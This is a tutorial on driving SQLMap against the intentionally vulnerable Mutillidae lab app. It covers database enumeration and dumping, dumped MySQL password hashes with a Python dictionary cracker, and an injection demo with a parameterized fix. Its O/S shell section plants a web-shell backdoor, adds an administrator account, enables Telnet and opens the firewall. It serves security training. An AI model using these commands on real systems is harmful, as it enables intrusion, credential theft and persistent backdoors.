SQL Injection with SQLMap


Overview

Note: See the SQL injection hint page for help specific to SQL injection. This page is dedicated to the tool SQLMap which can be helpful to evaluate the risk exposed by SQL injection vulnerabilities.

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. It is widely considered the best open-source SQL injection testing tool available.

Running SQLMAP Help

Note: On Kali Linux, SQLMap is found in /usr/share/sqlmap/

sqlmap --help    Basic help (most common options)
sqlmap -hh       Full help, listing every option

Running SQLMAP "Manually"

sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner

Capturing Request To Pass To SQLMAP

Create a valid HTTP request to the target page. Do not inject malicious input into this request; sqlmap supplies its own payloads, and a request that already contains one gives it a broken baseline to compare against. For example, using Burp Suite, capture the request in Burp Proxy --> Intercept, or look it up afterwards in Burp Proxy --> HTTP History.

Copy the HTTP request and save it to a text file (gedit is a reasonable editor), for example ~/engagements/sqlmap/login.php.request. The -r switch takes the path to this file.

Here is a sample request for URL: http://192.168.56.102/mutillidae/index.php?page=login.php

Request:
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.56.102/mutillidae/index.php?page=login.php
Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

username=asdf&password=asdf&login-php-submit-button=Login

Running SQLMAP with "auto-parse"

Start sqlmap, passing it the path to the file containing the HTTP request. Attempting to enumerate database server information (--banner) is a good first request. SQLMap parses the URL, the POST body and the cookie, then tries each parameter in turn to determine the database brand and the injection points.

sqlmap -r ~/engagements/sqlmap/login.php.request <options>

sqlmap may find the SQL injection automatically, but reconnaissance and some initial manual testing of the application greatly improve the chance of success and cut down the number of requests sqlmap has to send. Fingerprint the database and tell SQLMap with the --dbms parameter. Determine the likely vulnerable parameter and tell SQLMap with the -p parameter.

Example: sqlmap -r /tmp/request -p username --dbms=MySQL --banner
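As an added example (not part of the original page and not code from sqlmap), the following Python parses a saved request file the way the -r switch expects, lists the parameters sqlmap will consider (GET and POST at the default --level, Cookie values from --level 2 upward or when marked with a trailing * in the file) and checks that Content-Length still matches the body, which is the usual sign that a saved request was edited after capture. The request is a constructed copy of the sample above with the browser headers trimmed.

```python
"""Parse a raw HTTP request saved for `sqlmap -r` and list what sqlmap will test.

Added example for this page; not code from sqlmap. The request below is a
constructed copy of the page's sample request (browser headers trimmed)."""
from urllib.parse import parse_qsl, urlsplit

SAMPLE_REQUEST = (
    "POST /mutillidae/index.php?page=login.php HTTP/1.1\r\n"
    "Host: 192.168.56.102\r\n"
    "Referer: http://192.168.56.102/mutillidae/index.php?page=login.php\r\n"
    "Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 57\r\n"
    "\r\n"
    "username=asdf&password=asdf&login-php-submit-button=Login\r\n"
)


def parse_request(raw):
    """Split a raw request into (method, request-target, headers, body)."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Editors append a newline on save; a urlencoded body never contains one.
    return method, target, headers, body.rstrip("\n")


def injectable_parameters(raw):
    """Parameters sqlmap will consider, grouped by where they live.

    GET and POST are tested at the default --level 1; Cookie values need
    --level 2 or higher (or a trailing '*' marker in the request file)."""
    _method, target, headers, body = parse_request(raw)
    return {
        "GET": [k for k, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)],
        "POST": [k for k, _ in parse_qsl(body, keep_blank_values=True)] if body else [],
        "Cookie": [c.split("=", 1)[0].strip()
                   for c in headers.get("cookie", "").split(";") if c.strip()],
    }


def content_length_matches(raw):
    """True when the declared Content-Length equals the body's byte length.

    A mismatch usually means the body was edited after capture."""
    _method, _target, headers, body = parse_request(raw)
    declared = headers.get("content-length")
    if declared is None:
        return body == ""
    return int(declared) == len(body.encode("utf-8"))


if __name__ == "__main__":
    for place, names in injectable_parameters(SAMPLE_REQUEST).items():
        print(f"{place:7} {', '.join(names) or '-'}")
    print("Content-Length consistent:", content_length_matches(SAMPLE_REQUEST))
```

Run it against your own saved request by replacing SAMPLE_REQUEST with the file contents; the parameter list is what you choose -p from, and anything sqlmap must not touch (the login-php-submit-button here, or an anti-CSRF token) can be excluded with --skip.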

Once a vulnerable parameter has been identified, begin to enumerate the data structures:

Databases

--dbs

Tables in databases

--tables

Columns in tables

--columns

Feed each piece of information discovered into the next round of testing: a database name from --dbs becomes -D for --tables, a table name becomes -T for --columns, and so on.

Once the target information has been located, extract it with --dump. SQLMap can perform many other attacks (reading files, writing a web shell, an operating system shell) depending on the privileges granted to the database account the application connects with.

Running SQLMAP with various features

sqlmap -r ~/engagements/sqlmap/login.php.request <options>
--banner        Retrieve DBMS banner

    web server operating system: Windows
    web application technology: PHP 5.4.4, Apache 2.4.2
    back-end DBMS: MySQL 5.0
    banner: '5.5.25a'

--fingerprint   Perform an extensive DBMS version fingerprint

    web server operating system: Windows
    web application technology: PHP 5.4.4, Apache 2.4.2
    back-end DBMS: active fingerprint: MySQL >= 5.5.0

--current-user  Retrieve DBMS current user
--current-db    Retrieve DBMS current database
--hostname      Retrieve DBMS server hostname
--is-dba        Detect if the DBMS current user is DBA

    current user: 'root@localhost'
    current database: 'nowasp'
    current user is DBA: True
    hostname: 'mutillid-7se1xr'

--users         Enumerate DBMS users
--passwords     Enumerate DBMS users password hashes

    database management system users
    [*] ''@'localhost'
    [*] 'pma'@'localhost'
    [*] 'root'@'linux'
    [*] 'root'@'localhost'

--dbs           Enumerate DBMS databases

    available databases [10]:
    [*] cdcol
    [*] information_schema
    [*] mysql
    [*] nowasp
    [*] owasp10
    [*] owasp13
    [*] performance_schema
    [*] phpmyadmin
    [*] test
    [*] webauth

Enumerate DBMS database tables, columns, structure (schema)
--tables          Enumerate DBMS database tables
--columns         Enumerate DBMS database table columns
--schema          Enumerate DBMS schema
--count           Retrieve number of entries for table(s)
--exclude-sysdbs  Exclude DBMS system databases when enumerating tables
-D DB             DBMS database to enumerate
-T TBL            DBMS database table to enumerate
-C COL            DBMS database table column to enumerate
-U USER           DBMS user to enumerate

Extracting data

--dump              Dump DBMS database table entries
--dump-all          Dump all DBMS databases tables entries
-D DB               DBMS database to enumerate
-T TBL              DBMS database table to enumerate
-C COL              DBMS database table column to enumerate
-U USER             DBMS user to enumerate
--exclude-sysdbs    Exclude DBMS system databases when enumerating tables
--start=LIMITSTART  First query output entry to retrieve
--stop=LIMITSTOP    Last query output entry to retrieve
--sql-query=QUERY   SQL statement to be executed
--sql-shell         Prompt for an interactive SQL shell

Listing columns from tables

sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns
sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns
sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'"

--columns reads the column list from information_schema. --common-columns instead guesses column names from sqlmap's built-in wordlist, the fallback when information_schema cannot be queried (MySQL before 5.0, or an account without access to it). The --sql-query form is the same information_schema lookup done by hand; its output for the mysql.user table:

select column_name from information_schema.columns where table_name = 'user' [42]:
[*] Alter_priv
[*] Alter_routine_priv
[*] authentication_string
[*] Create_priv
[*] Create_routine_priv
[*] Create_tablespace_priv
[*] Create_tmp_table_priv
[*] Create_user_priv
[*] Create_view_priv
[*] Delete_priv
[*] Drop_priv
[*] Event_priv
[*] Execute_priv
[*] File_priv
[*] Grant_priv
[*] Host
[*] Index_priv
[*] Insert_priv
[*] Lock_tables_priv
[*] max_connections
[*] max_questions
[*] max_updates
[*] max_user_connections
[*] Password
[*] plugin
[*] Process_priv
[*] References_priv
[*] Reload_priv
[*] Repl_client_priv
[*] Repl_slave_priv
[*] Select_priv
[*] Show_db_priv
[*] Show_view_priv
[*] Shutdown_priv
[*] ssl_cipher
[*] ssl_type
[*] Super_priv
[*] Trigger_priv
[*] Update_priv
[*] User
[*] x509_issuer
[*] x509_subject

Advanced: Modifying injections

The login page builds its query by concatenating the two form fields:

SELECT * FROM accounts WHERE username='<username>' AND password='<password>'

A lone single quote in the password field leaves the statement unbalanced and produces a database error, which is how the injection point is confirmed by hand:

SELECT * FROM accounts WHERE username='' AND password='''

When sqlmap cannot work out the context on its own, tell it how to break out of the string: the prefix closes the quote the application opened, the suffix comments out the remainder of the original statement so the payload is the last thing the database parses.

sqlmap -r ~/engagements/sqlmap/login.php.request -p username --prefix="'" --suffix="-- " --banner

--prefix=PREFIX  Injection payload prefix string
--suffix=SUFFIX  Injection payload suffix string
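To make the prefix and suffix concrete, here is an added example (not from the page and not sqlmap code) that builds the login query above the same unsafe way, wraps a payload with --prefix "'" and --suffix "-- ", and shows the true/false pair a boolean-based test relies on, the syntax error you get without the suffix, and the parameterized query that makes the same payload harmless. SQLite stands in for MySQL and the accounts table is constructed in memory.

```python
"""How sqlmap's --prefix/--suffix wrap a payload, against the login query above.

Added example, not from the page or from sqlmap. SQLite stands in for MySQL;
the accounts table and its rows are constructed here."""
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)",
                    [("alice", "Wonderland1"), ("bob", "Builder2")])
    return con


def vulnerable_login(con, username, password):
    """The application's query, built by string concatenation (the flaw)."""
    query = ("SELECT username FROM accounts WHERE username='%s' AND password='%s'"
             % (username, password))
    return [row[0] for row in con.execute(query)]


def safe_login(con, username, password):
    """Same query with bound parameters: the payload never becomes SQL."""
    query = "SELECT username FROM accounts WHERE username=? AND password=?"
    return [row[0] for row in con.execute(query, (username, password))]


def wrap(payload, prefix="'", suffix="-- "):
    """What reaches the parameter once sqlmap applies --prefix and --suffix."""
    return prefix + payload + suffix


def demo():
    """The boolean pair sqlmap keys on, the no-suffix failure, and the fix."""
    con = make_db()
    out = {}
    # username='' OR 1=1-- ' AND password='x'  -> every row
    out["true"] = vulnerable_login(con, wrap(" OR 1=1"), "x")
    # username='' OR 1=2-- ' AND password='x'  -> no rows
    out["false"] = vulnerable_login(con, wrap(" OR 1=2"), "x")
    # Without the suffix the application's trailing quote is left unbalanced.
    try:
        vulnerable_login(con, wrap(" OR 1=1", suffix=""), "x")
        out["no_suffix"] = "ran"
    except sqlite3.OperationalError:
        out["no_suffix"] = "syntax error"
    # Bound parameters: the whole string is compared as a username.
    out["safe"] = safe_login(con, wrap(" OR 1=1"), "x")
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:10} {result}")
```

The difference between the "true" and "false" results is exactly what sqlmap's boolean-based blind technique measures; if your prefix or suffix is wrong, both requests error out and sqlmap reports the parameter as not injectable.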

Advanced: Dealing with inconsistent results

When sqlmap retrieves rows through inferential (blind) techniques, a query with no ORDER BY clause can return its rows in a different order on each run, so repeated extractions disagree with each other. Force a deterministic order:

select User, Password from mysql.user

versus

sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc"

select User, Password from mysql.user order by User desc

select User, Password, Host, authentication_string from mysql.user order by User desc [9]:
[*] root, , localhost,
[*] root, , linux,
[*] pma, , localhost,
[*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost,
[*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost,
[*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost,
[*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost,
[*] , , localhost,
[*] , , linux,

Note the empty Password fields for root, pma and the anonymous '' accounts: those need no cracking at all and are the finding to report first.

Cracking MySQL Password Hashes

John the Ripper command line:

/pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes

Password hashes in MySQL format (/tmp/mysql.hashes), one user:hash per line:

Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032
Patches:*2027D9391E714343187E07ACB41AE8925F30737E
Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B
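To see what john's mysql-sha1 format is actually attacking, here is an added example (not from the page and not John the Ripper code) that computes the MySQL 4.1+ mysql_native_password hash, the unsalted '*' + SHA1(SHA1(password)) scheme behind the 41-character hashes above, and runs a dictionary attack over a user:hash file. The hash file and wordlist are constructed here from known passwords; they are not the Mutillidae hashes.

```python
"""Compute and dictionary-attack MySQL 4.1+ (mysql_native_password) hashes,
the '*'-prefixed 41-character format john calls mysql-sha1.

Added example, not from the page or from John the Ripper. The hash file and
wordlist below are constructed from known passwords."""
import hashlib


def mysql_sha1(password):
    """MySQL's PASSWORD(): '*' + SHA1(SHA1(password)) as upper-case hex, no salt."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_hash_file(text):
    """user:hash lines, the layout fed to john --format=mysql-sha1."""
    hashes = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        hashes[user] = digest.strip().upper()
    return hashes


def crack(hashes, wordlist):
    """One double-SHA1 per candidate, checked against every target at once.

    Because the scheme is unsalted, one guess covers every user who shares
    that password, which is why the attack scales so well."""
    users_by_hash = {}
    for user, digest in hashes.items():
        users_by_hash.setdefault(digest, []).append(user)
    found = {}
    for candidate in wordlist:
        for user in users_by_hash.get(mysql_sha1(candidate), []):
            found[user] = candidate
    return found


# Constructed sample data; the user names are not the page's accounts.
SAMPLE_HASH_FILE = "\n".join(
    f"{user}:{mysql_sha1(pw)}"
    for user, pw in [("dbadmin", "password"), ("app", "Wonderland1"),
                     ("report", "correct horse battery staple")]
)
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "Wonderland1", "root"]


if __name__ == "__main__":
    for user, pw in crack(parse_hash_file(SAMPLE_HASH_FILE), SAMPLE_WORDLIST).items():
        print(f"{user}: {pw}")
```

Two caveats when you meet other MySQL versions: hashes of 16 hexadecimal characters with no '*' are the pre-4.1 scheme (john's --format=mysql), and MySQL 8's default caching_sha2_password produces salted strings beginning with $A$005$ that this function does not cover.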

Understanding sqlmap O/S Shell

View the transaction on the wire while sqlmap establishes the shell:

tcpdump -i eth1 -vvv -X

sqlmap builds the shell in two stages. The 1st stage is an uploader written to the web root through the injection; it is then used to upload the 2nd stage, the command shell page that --os-shell talks to.

1st Stage: Uploader
2nd Stage: Command Shell Page

Commands run through the shell on this Windows target to enable the Telnet service, add an administrative user and open the firewall to the host running sqlmap (192.168.56.101):

sc query state= all
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
net user root toor /add
net localgroup TelnetClients /add
net localgroup Administrators root /add
net localgroup TelnetClients root /add
netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

Interacting Directly with sqlmap O/S Shell Backdoor

The 2nd-stage page takes the command to run in its cmd parameter; <temp file name> is the random name sqlmap gave the uploaded backdoor (sqlmap prints the full URL when the shell is established). Anything done through --os-shell can therefore be done by requesting the page directly:

http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101

The uploaded page accepts commands from anyone who finds it, so remove both stages from the web root when the engagement ends.

Direct connection to the database

Installing the PyMySQL dependency:

git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL
python setup.py install
cd ..
rm -rf PyMySQL

(PyMySQL is also published on PyPI, so pip install pymysql is the simpler route today.)

Connect sqlmap straight to the database server with -d, using the form DBMS://USER:PASSWORD@HOST:PORT/DATABASE. This skips the web application entirely and is useful when credentials were recovered earlier and the database port is reachable:

sqlmap -d mysql://root:""@192.168.56.102:5123/nowasp

Videos


Automate SQL Injection using sqlmap
SQL Injection Explained - Part 6: Timing Attacks
SQL Injection Explained - Part 5: Union-Based SQL Injection
SQL Injection Explained - Part 9: Inserting Data
SQL Injection Explained - Part 10: Web Shells
SQL Injection Explained - Part 7: Reading Files
Basics of using sqlmap - ISSA KY Workshop - February 2013
Introduction to SQL Injection for Beginners
Introduction to SQL Injection with SQLMap